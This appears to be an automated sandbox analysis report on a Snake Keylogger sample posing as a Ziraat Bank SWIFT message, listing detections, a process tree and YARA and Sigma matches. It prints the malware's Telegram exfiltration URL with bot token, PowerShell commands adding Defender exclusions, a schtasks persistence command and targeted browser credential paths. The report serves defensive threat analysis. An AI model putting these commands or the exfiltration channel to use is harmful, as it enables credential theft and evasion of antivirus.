Edit tour

Windows Analysis Report
Ziraat Bankasi Swift Mesaji.exe

Overview

General Information

Sample name:	Ziraat Bankasi Swift Mesaji.exe
Analysis ID:	1620239
MD5:	fa4883ee6ff76b2325c56b3a09502ac7
SHA1:	a56d1515a44a1c2c2275e5249c84d00ce3ee6005
SHA256:	373b6c138897ab46738f2a8eedfa6a3d83d5186f4565514e9cd789cddc880062
Tags:	exeuser-threatcat_ch
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected Snake Keylogger

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Ziraat Bankasi Swift Mesaji.exe (PID: 5520 cmdline: "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" MD5: FA4883EE6FF76B2325C56B3A09502AC7)

powershell.exe (PID: 1124 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1048 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 2284 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 2128 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZnbATfUbUgZW" /XML "C:\Users\user\AppData\Local\Temp\tmpE679.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 5548 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

WerFault.exe (PID: 3160 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 1764 MD5: C31336C1EFC2CCB44B4326EA793040F2)

ZnbATfUbUgZW.exe (PID: 6396 cmdline: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe MD5: FA4883EE6FF76B2325C56B3A09502AC7)

WerFault.exe (PID: 2780 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6396 -s 1304 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7720744643:AAHCy3Fh8TZOag1r2Dwz3_tabeSbfKIUIZc/sendMessage?chat_id=7053140371", "Token": "7720744643:AAHCy3Fh8TZOag1r2Dwz3_tabeSbfKIUIZc", "Chat_id": "7053140371", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.4521556409.00000000030CB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x151f7:$a1: get_encryptedPassword 0x35c17:$a1: get_encryptedPassword 0x56437:$a1: get_encryptedPassword 0x154e3:$a2: get_encryptedUsername 0x35f03:$a2: get_encryptedUsername 0x56723:$a2: get_encryptedUsername 0x15003:$a3: get_timePasswordChanged 0x35a23:$a3: get_timePasswordChanged 0x56243:$a3: get_timePasswordChanged 0x150fe:$a4: get_passwordField 0x35b1e:$a4: get_passwordField 0x5633e:$a4: get_passwordField 0x1520d:$a5: set_encryptedPassword 0x35c2d:$a5: set_encryptedPassword 0x5644d:$a5: set_encryptedPassword 0x168a2:$a7: get_logins 0x372c2:$a7: get_logins 0x57ae2:$a7: get_logins 0x16805:$a10: KeyLoggerEventArgs 0x37225:$a10: KeyLoggerEventArgs 0x57a45:$a10: KeyLoggerEventArgs
00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1a15c:$x1: $%SMTPDV$ 0x3ab7c:$x1: $%SMTPDV$ 0x5b39c:$x1: $%SMTPDV$ 0x18b40:$x2: $#TheHashHere%& 0x39560:$x2: $#TheHashHere%& 0x59d80:$x2: $#TheHashHere%& 0x1a104:$x3: %FTPDV$ 0x3ab24:$x3: %FTPDV$ 0x5b344:$x3: %FTPDV$ 0x18ae0:$x4: $%TelegramDv$ 0x39500:$x4: $%TelegramDv$ 0x59d20:$x4: $%TelegramDv$ 0x16470:$x5: KeyLoggerEventArgs 0x16805:$x5: KeyLoggerEventArgs 0x36e90:$x5: KeyLoggerEventArgs 0x37225:$x5: KeyLoggerEventArgs 0x576b0:$x5: KeyLoggerEventArgs 0x57a45:$x5: KeyLoggerEventArgs 0x1a128:$m2: Clipboard Logs ID 0x1a366:$m2: Screenshot Logs ID 0x1a476:$m2: keystroke Logs ID
00000008.00000002.4519134868.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.4519134868.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.4519134868.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x148ff:$a1: get_encryptedPassword 0x14beb:$a2: get_encryptedUsername 0x1470b:$a3: get_timePasswordChanged 0x14806:$a4: get_passwordField 0x14915:$a5: set_encryptedPassword 0x15faa:$a7: get_logins 0x15f0d:$a10: KeyLoggerEventArgs 0x15b78:$a11: KeyLoggerEventArgsEventHandler
00000008.00000002.4519134868.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19864:$x1: $%SMTPDV$ 0x18248:$x2: $#TheHashHere%& 0x1980c:$x3: %FTPDV$ 0x181e8:$x4: $%TelegramDv$ 0x15b78:$x5: KeyLoggerEventArgs 0x15f0d:$x5: KeyLoggerEventArgs 0x19830:$m2: Clipboard Logs ID 0x19a6e:$m2: Screenshot Logs ID 0x19b7e:$m2: keystroke Logs ID 0x19e58:$m3: SnakePW 0x19a46:$m4: \SnakeKeylogger\
00000008.00000002.4521556409.0000000002F01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 5520	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 5520	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 5520	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 5520	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a2b:$a1: get_encryptedPassword 0x14d0d:$a2: get_encryptedUsername 0x14841:$a3: get_timePasswordChanged 0x1493c:$a4: get_passwordField 0x14a41:$a5: set_encryptedPassword 0x16f1b:$a7: get_logins 0x16e7e:$a10: KeyLoggerEventArgs 0x16ae9:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 5520	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x16ae9:$x5: KeyLoggerEventArgs 0x16e7e:$x5: KeyLoggerEventArgs 0x17785:$x5: KeyLoggerEventArgs 0x17ae6:$x5: KeyLoggerEventArgs 0x190a9:$m2: Clipboard Logs ID 0x191af:$m2: Screenshot Logs ID 0x19205:$m2: keystroke Logs ID 0x1933a:$m3: SnakePW 0x1919b:$m4: \SnakeKeylogger\
Process Memory Space: RegSvcs.exe PID: 5548	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 5548	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 5548	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5dc4a:$a1: get_encryptedPassword 0x5df2c:$a2: get_encryptedUsername 0x5da60:$a3: get_timePasswordChanged 0x5db5b:$a4: get_passwordField 0x5dc60:$a5: set_encryptedPassword 0x6013a:$a7: get_logins 0x6009d:$a10: KeyLoggerEventArgs 0x5fd08:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 5548	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x5fd08:$x5: KeyLoggerEventArgs 0x6009d:$x5: KeyLoggerEventArgs 0x609a4:$x5: KeyLoggerEventArgs 0x60d05:$x5: KeyLoggerEventArgs 0x622c8:$m2: Clipboard Logs ID 0x623ce:$m2: Screenshot Logs ID 0x62424:$m2: keystroke Logs ID 0x62559:$m3: SnakePW 0x623ba:$m4: \SnakeKeylogger\
Process Memory Space: ZnbATfUbUgZW.exe PID: 6396	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14aff:$a1: get_encryptedPassword 0x3531f:$a1: get_encryptedPassword 0x14deb:$a2: get_encryptedUsername 0x3560b:$a2: get_encryptedUsername 0x1490b:$a3: get_timePasswordChanged 0x3512b:$a3: get_timePasswordChanged 0x14a06:$a4: get_passwordField 0x35226:$a4: get_passwordField 0x14b15:$a5: set_encryptedPassword 0x35335:$a5: set_encryptedPassword 0x161aa:$a7: get_logins 0x369ca:$a7: get_logins 0x1610d:$a10: KeyLoggerEventArgs 0x3692d:$a10: KeyLoggerEventArgs 0x15d78:$a11: KeyLoggerEventArgsEventHandler 0x36598:$a11: KeyLoggerEventArgsEventHandler
0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c41a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cc3a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b64c:$a3: \Google\Chrome\User Data\Default\Login Data 0x3be6c:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba7f:$a4: \Orbitum\User Data\Default\Login Data 0x3c29f:$a4: \Orbitum\User Data\Default\Login Data 0x1cabe:$a5: \Kometa\User Data\Default\Login Data 0x3d2de:$a5: \Kometa\User Data\Default\Login Data
0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x156ce:$s1: UnHook 0x35eee:$s1: UnHook 0x156d5:$s2: SetHook 0x35ef5:$s2: SetHook 0x156dd:$s3: CallNextHook 0x35efd:$s3: CallNextHook 0x156ea:$s4: _hook 0x35f0a:$s4: _hook
0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a64:$x1: $%SMTPDV$ 0x3a284:$x1: $%SMTPDV$ 0x18448:$x2: $#TheHashHere%& 0x38c68:$x2: $#TheHashHere%& 0x19a0c:$x3: %FTPDV$ 0x3a22c:$x3: %FTPDV$ 0x183e8:$x4: $%TelegramDv$ 0x38c08:$x4: $%TelegramDv$ 0x15d78:$x5: KeyLoggerEventArgs 0x1610d:$x5: KeyLoggerEventArgs 0x36598:$x5: KeyLoggerEventArgs 0x3692d:$x5: KeyLoggerEventArgs 0x19a30:$m2: Clipboard Logs ID 0x19c6e:$m2: Screenshot Logs ID 0x19d7e:$m2: keystroke Logs ID 0x3a250:$m2: Clipboard Logs ID 0x3a48e:$m2: Screenshot Logs ID 0x3a59e:$m2: keystroke Logs ID 0x1a058:$m3: SnakePW 0x3a878:$m3: SnakePW 0x19c46:$m4: \SnakeKeylogger\
0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12cff:$a1: get_encryptedPassword 0x12feb:$a2: get_encryptedUsername 0x12b0b:$a3: get_timePasswordChanged 0x12c06:$a4: get_passwordField 0x12d15:$a5: set_encryptedPassword 0x143aa:$a7: get_logins 0x1430d:$a10: KeyLoggerEventArgs 0x13f78:$a11: KeyLoggerEventArgsEventHandler
0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a61a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1984c:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c7f:$a4: \Orbitum\User Data\Default\Login Data 0x1acbe:$a5: \Kometa\User Data\Default\Login Data
0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x138ce:$s1: UnHook 0x138d5:$s2: SetHook 0x138dd:$s3: CallNextHook 0x138ea:$s4: _hook
0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c64:$x1: $%SMTPDV$ 0x16648:$x2: $#TheHashHere%& 0x17c0c:$x3: %FTPDV$ 0x165e8:$x4: $%TelegramDv$ 0x13f78:$x5: KeyLoggerEventArgs 0x1430d:$x5: KeyLoggerEventArgs 0x17c30:$m2: Clipboard Logs ID 0x17e6e:$m2: Screenshot Logs ID 0x17f7e:$m2: keystroke Logs ID 0x18258:$m3: SnakePW 0x17e46:$m4: \SnakeKeylogger\
8.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12cff:$a1: get_encryptedPassword 0x12feb:$a2: get_encryptedUsername 0x12b0b:$a3: get_timePasswordChanged 0x12c06:$a4: get_passwordField 0x12d15:$a5: set_encryptedPassword 0x143aa:$a7: get_logins 0x1430d:$a10: KeyLoggerEventArgs 0x13f78:$a11: KeyLoggerEventArgsEventHandler
0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a61a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1984c:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c7f:$a4: \Orbitum\User Data\Default\Login Data 0x1acbe:$a5: \Kometa\User Data\Default\Login Data
8.2.RegSvcs.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14aff:$a1: get_encryptedPassword 0x14deb:$a2: get_encryptedUsername 0x1490b:$a3: get_timePasswordChanged 0x14a06:$a4: get_passwordField 0x14b15:$a5: set_encryptedPassword 0x161aa:$a7: get_logins 0x1610d:$a10: KeyLoggerEventArgs 0x15d78:$a11: KeyLoggerEventArgsEventHandler
0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x138ce:$s1: UnHook 0x138d5:$s2: SetHook 0x138dd:$s3: CallNextHook 0x138ea:$s4: _hook
0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c64:$x1: $%SMTPDV$ 0x16648:$x2: $#TheHashHere%& 0x17c0c:$x3: %FTPDV$ 0x165e8:$x4: $%TelegramDv$ 0x13f78:$x5: KeyLoggerEventArgs 0x1430d:$x5: KeyLoggerEventArgs 0x17c30:$m2: Clipboard Logs ID 0x17e6e:$m2: Screenshot Logs ID 0x17f7e:$m2: keystroke Logs ID 0x18258:$m3: SnakePW 0x17e46:$m4: \SnakeKeylogger\
8.2.RegSvcs.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c41a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b64c:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba7f:$a4: \Orbitum\User Data\Default\Login Data 0x1cabe:$a5: \Kometa\User Data\Default\Login Data
8.2.RegSvcs.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x156ce:$s1: UnHook 0x156d5:$s2: SetHook 0x156dd:$s3: CallNextHook 0x156ea:$s4: _hook
8.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a64:$x1: $%SMTPDV$ 0x18448:$x2: $#TheHashHere%& 0x19a0c:$x3: %FTPDV$ 0x183e8:$x4: $%TelegramDv$ 0x15d78:$x5: KeyLoggerEventArgs 0x1610d:$x5: KeyLoggerEventArgs 0x19a30:$m2: Clipboard Logs ID 0x19c6e:$m2: Screenshot Logs ID 0x19d7e:$m2: keystroke Logs ID 0x1a058:$m3: SnakePW 0x19c46:$m4: \SnakeKeylogger\
0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14aff:$a1: get_encryptedPassword 0x3551f:$a1: get_encryptedPassword 0x55d3f:$a1: get_encryptedPassword 0x14deb:$a2: get_encryptedUsername 0x3580b:$a2: get_encryptedUsername 0x5602b:$a2: get_encryptedUsername 0x1490b:$a3: get_timePasswordChanged 0x3532b:$a3: get_timePasswordChanged 0x55b4b:$a3: get_timePasswordChanged 0x14a06:$a4: get_passwordField 0x35426:$a4: get_passwordField 0x55c46:$a4: get_passwordField 0x14b15:$a5: set_encryptedPassword 0x35535:$a5: set_encryptedPassword 0x55d55:$a5: set_encryptedPassword 0x161aa:$a7: get_logins 0x36bca:$a7: get_logins 0x573ea:$a7: get_logins 0x1610d:$a10: KeyLoggerEventArgs 0x36b2d:$a10: KeyLoggerEventArgs 0x5734d:$a10: KeyLoggerEventArgs
0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c41a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ce3a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x5d65a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b64c:$a3: \Google\Chrome\User Data\Default\Login Data 0x3c06c:$a3: \Google\Chrome\User Data\Default\Login Data 0x5c88c:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba7f:$a4: \Orbitum\User Data\Default\Login Data 0x3c49f:$a4: \Orbitum\User Data\Default\Login Data 0x5ccbf:$a4: \Orbitum\User Data\Default\Login Data 0x1cabe:$a5: \Kometa\User Data\Default\Login Data 0x3d4de:$a5: \Kometa\User Data\Default\Login Data 0x5dcfe:$a5: \Kometa\User Data\Default\Login Data
0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x156ce:$s1: UnHook 0x360ee:$s1: UnHook 0x5690e:$s1: UnHook 0x156d5:$s2: SetHook 0x360f5:$s2: SetHook 0x56915:$s2: SetHook 0x156dd:$s3: CallNextHook 0x360fd:$s3: CallNextHook 0x5691d:$s3: CallNextHook 0x156ea:$s4: _hook 0x3610a:$s4: _hook 0x5692a:$s4: _hook
0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19a64:$x1: $%SMTPDV$ 0x3a484:$x1: $%SMTPDV$ 0x5aca4:$x1: $%SMTPDV$ 0x18448:$x2: $#TheHashHere%& 0x38e68:$x2: $#TheHashHere%& 0x59688:$x2: $#TheHashHere%& 0x19a0c:$x3: %FTPDV$ 0x3a42c:$x3: %FTPDV$ 0x5ac4c:$x3: %FTPDV$ 0x183e8:$x4: $%TelegramDv$ 0x38e08:$x4: $%TelegramDv$ 0x59628:$x4: $%TelegramDv$ 0x15d78:$x5: KeyLoggerEventArgs 0x1610d:$x5: KeyLoggerEventArgs 0x36798:$x5: KeyLoggerEventArgs 0x36b2d:$x5: KeyLoggerEventArgs 0x56fb8:$x5: KeyLoggerEventArgs 0x5734d:$x5: KeyLoggerEventArgs 0x19a30:$m2: Clipboard Logs ID 0x19c6e:$m2: Screenshot Logs ID 0x19d7e:$m2: keystroke Logs ID
Click to see the 25 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", ParentImage: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe, ParentProcessId: 5520, ParentProcessName: Ziraat Bankasi Swift Mesaji.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", ProcessId: 1124, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZnbATfUbUgZW" /XML "C:\Users\user\AppData\Local\Temp\tmpE679.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZnbATfUbUgZW" /XML "C:\Users\user\AppData\Local\Temp\tmpE679.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", ParentImage: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe, ParentProcessId: 5520, ParentProcessName: Ziraat Bankasi Swift Mesaji.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZnbATfUbUgZW" /XML "C:\Users\user\AppData\Local\Temp\tmpE679.tmp", ProcessId: 2128, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", ParentImage: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe, ParentProcessId: 5520, ParentProcessName: Ziraat Bankasi Swift Mesaji.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", ProcessId: 1124, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

